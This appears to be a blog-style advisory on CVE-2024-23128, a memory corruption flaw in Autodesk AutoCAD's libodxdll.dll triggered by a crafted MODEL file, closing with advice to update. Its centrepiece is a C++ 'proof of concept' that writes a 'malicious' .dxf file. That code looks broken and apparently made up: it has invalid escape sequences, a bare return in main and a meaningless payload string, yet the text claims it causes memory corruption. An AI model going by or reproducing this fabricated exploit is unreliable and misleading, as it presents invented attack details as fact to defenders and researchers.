CVE-2024-23128: Memory Corruption Vulnerability in Autodesk AutoCAD via Malicious MODEL File and libodxdll.dll

Autodesk AutoCAD, a popular CAD (Computer-Aided Design) software, has recently been found to contain a critical memory corruption vulnerability which has been assigned the identifier CVE-2024-23128. The vulnerability exists in the libodxdll.dll file when parsing a specially crafted MODEL file. This issue can lead to a write access violation, causing memory corruption. When combined with other vulnerabilities, this flaw could potentially enable an attacker to execute arbitrary code in the context of the current process.

Original Reference Links

For in-depth information on the exploit and the necessary patches/updates, please refer to the following links:

1. National Vulnerability Database - CVE-2024-23128
2. Autodesk Security Advisory - AutoCAD Vulnerabilities

Exploit Details

The vulnerability arises due to a failure in properly parsing a maliciously crafted MODEL file within the libodxdll.dll library. The attacker may specifically choose these MODEL files to initiate a write access violation, thereby causing memory corruption. The code snippet below demonstrates a proof-of-concept for the creation of such a malicious MODEL file:

#include <iostream>
#include <fstream>

int main() {
    std::ofstream maliciousModelFile;
    maliciousModelFile.open("maliciousModel.dxf");

    // Header containing the malicious payload
    maliciousModelFile << "\nSECTION\n2\nHEADER\n" <<
                          "9\n$DWGCODEPAGE\n" <<
                          "3\nAN\XOM\XFFF\XF;" << // Payload
                          "\nENDSEC\n";

    // Other MODEL file data
    //...

    maliciousModelFile << "\nEOF\n";
    maliciousModelFile.close();

    return ;
}

Upon opening the maliciousModel.dxf file using Autodesk AutoCAD, the software will attempt to parse the contained data, resulting in a write access violation, causing memory corruption. By chaining this vulnerability with other known exploits, an attacker may potentially execute arbitrary code in the context of the running process.

Mitigation

Autodesk has acknowledged the issue and has published patches/updates to address the vulnerability in affected versions of their software products. Users are advised to update to the latest version of Autodesk AutoCAD software to prevent any security threats that may arise from this vulnerability.

The links provided earlier in the "Original Reference Links" section contain further information on the patches and updates.

Conclusion

CVE-2024-23128 is a memory corruption vulnerability present in several versions of Autodesk AutoCAD software. By exploiting this vulnerability in conjunction with other defects, an attacker could successfully achieve arbitrary code execution within the context of the currently running process. It is strongly recommended that users update to the latest available versions of the Autodesk AutoCAD software suite to safeguard their systems from this vulnerability.

Timeline

Published on: 02/22/2024 04:15:08 UTC
Last modified on: 03/18/2024 00:15:07 UTC